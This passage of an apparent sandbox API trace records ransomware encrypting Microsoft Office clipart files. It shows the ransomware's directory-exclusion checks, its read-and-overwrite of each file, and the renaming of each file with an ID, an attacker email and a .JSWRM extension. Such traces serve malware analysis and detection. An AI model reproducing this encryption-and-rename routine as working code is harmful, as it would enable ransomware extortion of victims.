hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.952] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00252_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00252_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0074.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.952] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd685b3d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6c8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00254_.WMF", cAlternateFileName="")) returned 1 [0074.952] lstrcmpiW (lpString1="BL00254_.WMF", lpString2=".") returned 1 [0074.952] lstrcmpiW (lpString1="BL00254_.WMF", lpString2="..") returned 1 [0074.952] lstrcmpiW (lpString1="BL00254_.WMF", lpString2="...") returned 1 [0074.952] lstrcmpiW (lpString1="BL00254_.WMF", lpString2="windows") returned -1 [0074.952] lstrcmpiW (lpString1="BL00254_.WMF", lpString2="recovery") returned -1 [0074.952] lstrcmpiW (lpString1="BL00254_.WMF", lpString2="perflogs") returned -1 [0074.952] lstrcmpiW (lpString1="BL00254_.WMF", lpString2="documents and settings") returned -1 [0074.952] lstrcmpiW (lpString1="BL00254_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.952] lstrcmpiW (lpString1="BL00254_.WMF", lpString2="system volume information") returned -1 [0074.952] lstrcmpiW (lpString1="BL00254_.WMF", lpString2="msocache") returned -1 [0074.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0074.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00254_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00254_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00254_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0074.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0074.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00254_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00254_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00254_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0074.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.953] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00254_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.997] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1736) returned 1 [0074.997] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6c0) returned 0x23fc98 [0074.997] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x6c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x6c0, lpOverlapped=0x0) returned 1 [0074.999] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.999] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x6c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x6c0, lpOverlapped=0x0) returned 1 [0074.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0074.999] CloseHandle (hObject=0x460) returned 1 [0074.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0074.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0074.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0074.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0074.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0074.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.999] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00254_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00254_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0075.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.000] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd65f8ed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30c2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00261_.WMF", cAlternateFileName="")) returned 1 [0075.000] lstrcmpiW (lpString1="BL00261_.WMF", lpString2=".") returned 1 [0075.000] lstrcmpiW (lpString1="BL00261_.WMF", lpString2="..") returned 1 [0075.000] lstrcmpiW (lpString1="BL00261_.WMF", lpString2="...") returned 1 [0075.000] lstrcmpiW (lpString1="BL00261_.WMF", lpString2="windows") returned -1 [0075.000] lstrcmpiW (lpString1="BL00261_.WMF", lpString2="recovery") returned -1 [0075.000] lstrcmpiW (lpString1="BL00261_.WMF", lpString2="perflogs") returned -1 [0075.000] lstrcmpiW (lpString1="BL00261_.WMF", lpString2="documents and settings") returned -1 [0075.000] lstrcmpiW (lpString1="BL00261_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.001] lstrcmpiW (lpString1="BL00261_.WMF", lpString2="system volume information") returned -1 [0075.001] lstrcmpiW (lpString1="BL00261_.WMF", lpString2="msocache") returned -1 [0075.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0075.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00261_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00261_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00261_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0075.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0075.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00261_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00261_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00261_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0075.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.001] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00261_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.001] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12482) returned 1 [0075.001] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30c0) returned 0x24c1d0 [0075.001] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x30c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x30c0, lpOverlapped=0x0) returned 1 [0075.004] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.004] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x30c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x30c0, lpOverlapped=0x0) returned 1 [0075.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.004] CloseHandle (hObject=0x460) returned 1 [0075.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0075.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0075.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0075.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0075.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0075.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0075.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0075.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.004] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00261_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00261_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0075.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.005] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd65f8ed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00262_.WMF", cAlternateFileName="")) returned 1 [0075.005] lstrcmpiW (lpString1="BL00262_.WMF", lpString2=".") returned 1 [0075.005] lstrcmpiW (lpString1="BL00262_.WMF", lpString2="..") returned 1 [0075.005] lstrcmpiW (lpString1="BL00262_.WMF", lpString2="...") returned 1 [0075.005] lstrcmpiW (lpString1="BL00262_.WMF", lpString2="windows") returned -1 [0075.005] lstrcmpiW (lpString1="BL00262_.WMF", lpString2="recovery") returned -1 [0075.005] lstrcmpiW (lpString1="BL00262_.WMF", lpString2="perflogs") returned -1 [0075.005] lstrcmpiW (lpString1="BL00262_.WMF", lpString2="documents and settings") returned -1 [0075.005] lstrcmpiW (lpString1="BL00262_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.005] lstrcmpiW (lpString1="BL00262_.WMF", lpString2="system volume information") returned -1 [0075.005] lstrcmpiW (lpString1="BL00262_.WMF", lpString2="msocache") returned -1 [0075.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0075.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00262_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00262_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00262_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0075.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0075.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00262_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00262_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00262_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0075.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.006] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00262_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.006] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2556) returned 1 [0075.006] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9f0) returned 0x23fc98 [0075.006] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x9f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x9f0, lpOverlapped=0x0) returned 1 [0075.008] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.008] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x9f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x9f0, lpOverlapped=0x0) returned 1 [0075.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0075.008] CloseHandle (hObject=0x460) returned 1 [0075.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0075.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0075.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0075.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0075.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0075.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.008] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00262_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00262_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0075.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.009] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd65f8ed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1678, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00265_.WMF", cAlternateFileName="")) returned 1 [0075.009] lstrcmpiW (lpString1="BL00265_.WMF", lpString2=".") returned 1 [0075.009] lstrcmpiW (lpString1="BL00265_.WMF", lpString2="..") returned 1 [0075.009] lstrcmpiW (lpString1="BL00265_.WMF", lpString2="...") returned 1 [0075.009] lstrcmpiW (lpString1="BL00265_.WMF", lpString2="windows") returned -1 [0075.009] lstrcmpiW (lpString1="BL00265_.WMF", lpString2="recovery") returned -1 [0075.009] lstrcmpiW (lpString1="BL00265_.WMF", lpString2="perflogs") returned -1 [0075.009] lstrcmpiW (lpString1="BL00265_.WMF", lpString2="documents and settings") returned -1 [0075.009] lstrcmpiW 